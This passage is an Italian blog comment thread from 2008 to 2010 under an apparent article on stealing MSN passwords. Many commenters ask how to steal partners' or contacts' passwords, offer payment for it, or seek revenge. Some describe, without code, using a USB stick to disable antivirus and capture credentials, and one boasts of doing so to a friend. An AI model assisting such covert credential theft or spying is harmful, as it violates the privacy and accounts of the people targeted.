  111. 114 Dareios 8, settembre, 2008 alle 2:12 pm

    x lucio, non gli script di msn però essendo quelli non pericolosi secondo il sistema, altrimenti non potresti neanche installare quelli che ti modificano il tema di msn.

  112. 115 brigida 11, settembre, 2008 alle 4:42 pm

    uff raga aiutatemi nn so come devo fare un mio amico ha scoperto la risposta della domandasegreta e nn so come fare vi prg aiutatemi sn disperata..e piango..

  113. 116 Lucio 21, settembre, 2008 alle 6:12 am

    X brigida
    Bell’amico di m…..

    Leggi questo articolo che ti indica come recuperare la password:
    http://my.opera.com/pizzarone/blog/recuperare-la-password-rubata-in-msn
    Ciao

  114. 117 ice 21, settembre, 2008 alle 9:00 pm

    salve ragazzi vi prego dovete aiutarmi devo scoprire la password di msn della mia ragazza cè un programma un link da scarikare? è importante😦

  115. 118 zayron 26, settembre, 2008 alle 10:29 pm

    salve a tutti…non ci crederete ma…30min fà ho cambiato la mia password…e nn mi ricordo cosa ci ho scritto >_< xk sono il tipo che scrive password del tipo “password” “sevbèboom” “oddiokebello!” ecc….xD vabbè il problema è questa non me la ricordo….non mi ricordo neanche la domanda segreta…e non mi arriva l’email alla email secondaria (non so perchè) non è che mi potreste dire come posso fare a trovarla??non la devo rubare è una mia email…potete anche contattarmi per chiedermelo in questo momento sono connesso…non voglio scollegarmi sennò cm rientro…la mail è zayron@hotmail.it
    perfavore aiutatemi ci tengo molto a questa email…nn me la voglio rifare!

  116. 119 zayron 26, settembre, 2008 alle 11:05 pm

    ok me la sono ricordata grazie lo stesso…comunque se mi volete dire come fare a trovare la mia password nel mio pc mi sarebbe molto utili nel caso me la dimenticassi dinuovo…posso assicurare che è la mia mail!

  117. 120 giampa_90 3, ottobre, 2008 alle 8:33 pm

    Lucio è molto difficile che un antivirus riconosca uno script (a meno che nn usi kaspersky) (di cui ho un casino di seriali)
    🙂 giampa_90@live.it

  118. 121 CARLA 5, ottobre, 2008 alle 7:42 pm

    COME FACCIO A RISALIRE A UN CONTATTO MSN CONOSCENDO IN NIK DI NETLOG
    E BASTE RIX AL PIU’ PRESTO GRAZIE MILLE

  119. 122 fiorella mauro 7, ottobre, 2008 alle 10:29 am

    mi hanno rubato ilblog

  120. 123 LUIGI 8, ottobre, 2008 alle 1:34 am

    MA CR CA.. SIETE TUTTI DISPERATI TUTTI GLI HACKER E CRACKE RVOLETE FA E CHE DIANIME MAH ….CMQ:D SAPET DIRMI IN MODO SEMPLICE COME SI FA A RUBARE NA PASSWORD?:S:D SN DIISPERATO

  121. 124 ron 9, ottobre, 2008 alle 2:16 pm

    sul mio pc portatile siamo in diversi ad utilizzare posta elettronica e cose varie. come posso sapere le login e le password lasciate sul mio pc da quelli che lo utilizzano?grazie

  122. 125 Carmela 14, ottobre, 2008 alle 5:04 pm

    x favore cambiategli la password e mandatemela attraverso il mio indirizzo toromartin@hotmail.it

  123. 126 romina 15, ottobre, 2008 alle 10:19 am

    ciao come va? volevo una risposta su msn, io voglio togliere il contatto vecchio mio e la powword sa dirmi come posso usare?per favore.

  124. 127 me 18, ottobre, 2008 alle 8:38 pm

    envio@edalpha.com per conto di sweetlum@hotmail.it
    questi due indirizzi, anche se non so chi sono e come hanno avuto la mia email, mi hanno mandato mail x rubare password msn… spacciandola x un qlcs che scopre chi ti ha bloccato come contatto….occhio!

  125. 128 Lucio 20, ottobre, 2008 alle 4:54 pm

    X Giampa 90

    Io uso avg e appena uso lo script descritto lo blocca.
    Prrovare per credere🙂
    Morale tempi duri per questi trucchetti
    Ciao

  126. 129 simona 21, ottobre, 2008 alle 1:33 pm

    x underground0 .. ti volevo chiedere se mi puoi contattare per una proposta che ti vorrei fare a proposito di password ! grazie comunque

  127. 130 rafat 23, ottobre, 2008 alle 11:08 am

    ciao, volevo dirti che non sono riuscita a capire nulla di quello che hai detto, su come rubare una password…sinceramente io non ho alcun interesse a rubare password, e questa per me è la prima volta, lo faccio solo per scoprire quello che ha il mio ragazzo su msn, perche ho il dubbio che qualcosa non quadra bene.
    ti prego ho assoluto bisogno di una risposta, ti prego aiutami!!!

  128. 131 Lucio 2, novembre, 2008 alle 8:55 am

    X chiunque richiede password

    Underground vi ha dato una dritta sta voi capire il meccanismo.
    Cmq volevo avvisarvi che con le nuove generazioni di antivirus tutto questo viene bloccato.
    Un metodo per chi ha accesso al computer del vostro ragazzo o esso che sia e quello di usare una chiavetta usb con un relativo soft che dopo aver bloccato dell’antivurus si puo’ lanciare e rilevare la pass.

    Queste benedette donne🙂

  129. 132 marco 12, novembre, 2008 alle 5:40 pm

    Salve a tutti
    avrei bisogno di una informazione ( perdonatemi sono un neofita )
    E’ POSSIBILE ( credo di si ! ) entrare in una casella di posta conoscendo solo la @mail e avendo a disposizione il PC da dove si inviano ?

    Vi prego è molto importante saperlo , io ho un semplicissimo PC portatile ( acquistato tramite il progetto ALICE ADSL ) e da qualche giorno ho visto nella cartella cronologia le tracce di un collegamento Web Mail …. ma aprendo la pagina mi fa vedere solo le intestazioni delle @mail e non mi fa aprire il testo .
    Aiutatatemi , so che forse con la cartella temp resta qualche traccia della pwd ma non ho idea come prenderla , ho bisogno di sapere per la mia ..”serenità ” altrimenti i dubbi …….potrei sbagliarmi di molto !!!

    Aspetto con anzia la risposta questa è la mi a @mail .
    marcoservizi@libero .it

  130. 133 francesco 13, novembre, 2008 alle 3:08 pm

    c’è un ragazzo che si ruba tutte le passuord come posso vendicarmi

  131. 134 owned 13, novembre, 2008 alle 4:34 pm

    mi hanno rubato il mio contatto msn facchio@hotmail potreste recuperarmi la pasword ?????? contattatemi a facchio2008@hotmail.it o magari mi dite come si fa??? io la sapevo la domanda segreta (e anke la risposta) ma l’hanno kambiata ora appare criptata stavo pensando di denunziare alla polizia postale è una buona idea?oppure devo lamentarmi con la mikrosoft?ora non so piu’ ke fare sono disperato ceeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee

  132. 136 owned 13, novembre, 2008 alle 4:35 pm

    mi hanno rubato il mio contatto msn facchio@hotmail.it potreste recuperarmi la pasword ?????? contattatemi a facchio2008@hotmail.it o magari mi dite come si fa??? io la sapevo la domanda segreta (e anke la risposta) ma l’hanno kambiata ora appare criptata stavo pensando di denunziare alla polizia postale è una buona idea?oppure devo lamentarmi con la mikrosoft?ora non so piu’ ke fare sono disperato ceeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee

  133. 137 bela-vito 30, novembre, 2008 alle 7:06 pm

    CERCO UN HACKER URGENTEMENTE PERCHE’ MI HANNO RUBATO LA PASSWORD DI HOTMAIL E NON RICORDO PIU’ LA DOMANDA VISTO CHE HO FATTO L’EMAIL PARECCHI ANNI FA, PERFAVORE AIUTATEMI LA MIA NUOVA E MAIL MOMENTANEA E bela-vito@hotmail.it

  134. 138 miki 2, dicembre, 2008 alle 5:16 pm

    ciao è possibile modificare il tuo codice per fare in modo tale di non mettere la password del mio ftp e magari inviare i dati ad un indirizzo email che potrebbe rimanere anonimo grazie a yopmail

    in sintesi la password puo essere inviata a un indirizzo mail?

  135. 139 sciscio 2, dicembre, 2008 alle 10:06 pm

    ciao…. io sn una d qll xsone ke memorizzano spr le password… ma se qlcn me le ruba… so cm fargliela pagare…
    cmq c’è qlcn ke m sa spiegare cm si usa “ieexpress” e cm si fa il resto d conseguenza???…. pls… il mio indirizzo e-mail è “scisciozambo@hotmail.it”

  136. 140 theking91 5, dicembre, 2008 alle 3:38 pm

    ciao mi interesserebbe scoprire la password di un mio contatto msn…come posso fare???mi serve urgentemente perke e una cosa molto importante…potreste rispondermi a vlre91@hotmail.com grazie anticipato

  137. 141 winny 8, dicembre, 2008 alle 7:24 am

    Per quanto insolito mi rivolgo a underground0 chidendogli se è possibile contattarlo via e-mail per un’argomentazine molto seria e importante

  138. 142 Evelin 16, dicembre, 2008 alle 12:14 am

    Alcuni giorni fa sono entrati col mio account cambiandomi password e domanda segreta. Qualcuno mi aiuti perfavore, in quell’email avevo contatti che non sono più rintracciabili in web nè in altro modo.
    Tra l’altro ho il sospetto su chi sia stato e vorrei fargliela pagare.
    Ovviamente possiamo accordarci su come ricambierò io per il favore fatto. Grazie.

  139. 143 claudio 30, dicembre, 2008 alle 10:01 pm

    aiutatemi cè qualcuno che si connette con il mio accaunt, nn c’è la faccio piu… aiuto

  140. 144 elisa 4, gennaio, 2009 alle 12:22 am

    io ti pc di sistmi nn ne capisco…ci sarebbe un modo semplice che ti do il contatto msn e se riesci a prelevare la passsword???risp al piu prsto…..grazie mille.

  141. 145 pizzarone 4, gennaio, 2009 alle 1:19 pm

    Dopo mesi di prove sono riuscito finalmente a trovare un sistema fantastico invisibile agli antivirus e sotto forma di programma anche il più sospettoso utente.
    Certamente devo dire Grazie a Underground per avermi fornito le basi descritte su questo blog, ma poi per passione e studio per nuove tecniche di phishing sono riuscito a creare questo soft.
    Naturalmente non posso rivelare o fare uno share del programma perchè questo è nato solo a scopo di studio e potrebbe creare dei veri problemi.
    Visto i lamer che ci sono in giro…
    Ciao

  142. 146 trex 5, gennaio, 2009 alle 5:06 am

    io nn ti kiedo di rubare altre password ma vorrei recuperare la mia…………nel senso ke senza aver cambiato la password nn mi fa accedere al window live messenger……….mi da il codice errore 80042323……….e’ urgentissimo…………sei la mia speranza^^

  143. 147 Milk shake 15, gennaio, 2009 alle 3:46 pm

    ahaha io lo sapevooo … xD

  144. 148 Antonio 30, gennaio, 2009 alle 11:13 am

    Ciao potresti recuperarmi la password di ermipic@hotmail.it? E’ di mia cugina,le hanno cambiato sia la password che la domanda segreta,te ne sarei davvero grato. Sei un grande ciao ciao

  145. 149 Fabio 23, febbraio, 2009 alle 1:27 pm

    ho bisogno di recuparare la pass di una casella mail ….@hotmail.com….è urgentissimo….ovviamente disposto a pagare te o chi per te possa farmi questo favore….
    contattami a fabio.riva@live.it nell’oggetto scrivere MSN…

    Grazie

  146. 150 Antonella 26, febbraio, 2009 alle 8:41 am

    URGENTE! Per cortesia. Anch’io ho bisogno di recuparare la pass di una casella mail. disposto a pagare.
    contattami al più presto!
    Grazie

  147. 151 Andrea 28, febbraio, 2009 alle 5:57 pm

    ciao a tutty la mia ragazza non riescie piu a utilizzare msn xke ha perso la pass e ora ha kiesto a me di recuperala dal mio pc visto ke io abito lontanto da lei e ci vediamo poko xke sn via x lavoro mi potete dire come posso fare x recuperarla?? x contattarmi files88@hotmail.it

  148. 152 MARTINA 18, marzo, 2009 alle 2:06 pm

    CIAO…SPERO MI CONTATTERE SU QUESTO INDIRIZZO EMAIL: cricchetta19@hotmail.it …vorrei avere delle informazioni su come recuperare password e domanda segreta. Grazie.

  149. 153 bionda4ever 30, marzo, 2009 alle 8:59 am

    purtroppo anche a mia sorella è successo ma hanno fatto di peggio hanno rubato la sua idantità….vorrei che mia sorella recuperasse la sua password e la sua risposta segreta vi prego contattateci subito

  150. 154 bionda4ever 30, marzo, 2009 alle 9:04 am

    hanno rubato password e la risposta segreta sul contatto sexycats@live.it aiutateci grazie

  151. 155 EllyB_PurpLe 18, aprile, 2009 alle 3:31 pm

    Alla mia migliore amika hanno rubato la password è qst stronzo/a mi insulta qnd entro su msn… vorrei recuperare la password kambiarla e mettere fine a qst insulti( se la/o piglio l’ammazzo)
    Mi aiuti x favore???
    Grazie…
    Se vuoi parlarne su msn il mio kontatto è elenaweb@msn.com

  152. 156 Luca 25, maggio, 2009 alle 8:21 pm

    Salve, lo so che è passato molto tempo dalla pubblicazione dell’ articolo, però è davvero importante e urgente, c’è una persona che è entrata nei contatti dei miei “amici” (penso che dopo questo non lo saranno più) e si spaccia per me, praticamente è entrato nel contatto di un mio amico e ne ha contattato un altro, dicendogli che ero io e avevo fregato il contatto all’ altro, e che l’ avrebbe preso pure a lui, e così ha fatto, ormai ha rubato 4 account, cambiando la password più volte visto che è tanto stupido da non cambiare le domande e qualche mio amico che se le ricorda riesce a reimpostare la propria password (anche se secondo me lo fa a posta).
    Qualcuno può aiutarmi?
    Per contattarmi tramite e-mail ecco il mio account: karateluca@gmail.com
    Scrivetelo prima qui, non controllo mai quell’ account

  153. 157 Sdriccina87 19, giugno, 2009 alle 3:24 pm

    no1globe per favore avrei bisogno del tuo aiuto per trovare una password il mio contatto è buffylegend@hotmail.it per favore contattami….grazie in anticipo

  154. 158 Sdriccina87 19, giugno, 2009 alle 3:27 pm

    Naturalmente l’invito è per chiunque sia in grado di farlo…

  155. 159 mirco 21, giugno, 2009 alle 5:02 pm

    ciao…dovrei rubare una password x vendetta…sl ke non ho capito un gran che di come si fa…non è ke me lo potete spiegare meglio…vi lascio anche il mio indirizzo messanger: Mitico_FregniMirco@msn.com
    Spero di avere vostre risposte…grazie…ciao

  156. 161 devilmaurizio@live.it 28, giugno, 2009 alle 1:52 pm

    io ci sono riuscito a fare la chiavetta e mi funziona, un giorno ero andato a casa della mia amica ho detto : collego un po la pen drive ti do la canzone new divide dei linkin park invece mi sono preso la sua password … ha ha h ahhhh……..
    kmq io nn h seguito questa guida, ho seguito questa:

    è un pò lungo il video ma se lo seguite tutto imparerete benissimo come si fà !

  157. 162 franco 29, giugno, 2009 alle 2:03 pm

    ciao a tutti non scaricate messeger pass a parte ke e in legale poi a molti virus trojan dopo alcune ore vengo fuori dopo sono problemi per togliere tuti i virus ciao a tutti

  158. 163 ..._pIkKoLiNA_... 25, agosto, 2009 alle 9:38 am

    qualkuno mi ruba la pax ma nn riesko a capire ki…mi potete dire km si fa a capirlo???vi prego aiutTEMI..

  159. 164 morna 12, settembre, 2009 alle 10:55 am

    Puoi spedirmi una spiegazione dettagliata che non ho ben capito?
    grazie mille! “la protezione oggi non e’ mai abbastanza”

  160. 165 alfio 16, settembre, 2009 alle 2:10 pm

    vi prego aiutatemi per favore mi anno rubato la passuord e non so piu cuale e so chi me la rubata ma lui nonn vuole dirmelo e quindi gliela voglio rubare io e dentro il mio contatto cerano amici e pure contatti della mia famigliavi prego sono disperato davvero ho tentato in tutti i modi per favore io ci tengo al mio contatto e solo a pensarci mi viene da piangere
    angueeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
    PS:so che non mi aiuterete vero:(

  161. 166 Serena 30, ottobre, 2009 alle 7:58 am

    Ciao. Volevo chiederti questo piacere in quanto non sono praticissima di computers… Come posso capire se sul mio pc sono stati installati dei programmi (quasi sicuramente via chiavetta) per spiare le mie passwords e le cose scrivo. Sono quasi sicura al 100% che il mio ragazzo mi abbia buttato dentro qualcosa. Grazie molte per la risposta.

  162. 167 Pizzarone 30, novembre, 2009 alle 2:18 pm

    X Serena
    Un buon antivirus blocca tutto es Kaspersky, Nod32

  163. 168 roy 19, gennaio, 2010 alle 8:10 pm

    ciao mia cugina ha configurato la prima volta email facendo tutto giusto ma quando digita la pass continua ha dire di rifarlo,e non riesce entrare nella posta.Ma la password è giusta cosa devo fare???

  164. 169 MasterEclipse 22, febbraio, 2010 alle 9:51 pm

    Ciao underground, ho letto quel che hai scritto.
    Non scrivo x saper come fregare le pass ma bensì x un motivo ben preciso.
    Ampliare le mie conoscenze nel campo della programmazione e te mi sembri uno tosto🙂

    Ho fermato i miei studi in 5° superiore abbandonando la scuola… ma li nn ti insegnano nulla di nulla o quasi.

    se ti va di darmi qualche dritta hai la mia email🙂

    Grazie ciau

  165. 170 matte 17, giugno, 2010 alle 5:24 pm

    Pizzarone 30, novembre, 2009 alle 2:18 pm

    X Serena
    Un buon antivirus blocca tutto es Kaspersky, Nod32

    Non è assolutamente vero!!!! Ogni antivirus o difese di ogni tipo, ha falle. E se uno le sa sfruttare l’antivisus è f****to, lo so perché io ho un vecchio computer (quasi da buttare, è per questo che lo uso da cavia per imparare e studiare i programmi come antivirus, per testarne le difese) dove gli ho installato molti antivirus (uno alla volta naturalmente) e ho notato che ognuno ha falle diverse. Gli ho messo io personalmente dei virus (e accidenti vari) apposta per vedere come reagivano e molte volte non li rilevavano neanche con una scansione approfondita. Quindi consiglio tutti di stare attenti a quello che importate da internet (scaricate) perché ci può essere sempre il virus (keylogger, spywere o quel che si voglia) nascosto dietro.


  1. 1 Come trovare la password di una casella e-mail « UnderGround0 World Trackback su 18, novembre, 2007 alle 10:11 am
  2. 2 Meme: come sei diventato Blogger? « UnderGround0 World Trackback su 25, novembre, 2007 alle 2:31 pm
Comments are currently closed.



Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,049,926 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

novembre: 2007
L M M G V S D
« Ott   Dic »
 1234
567891011
12131415161718
19202122232425
2627282930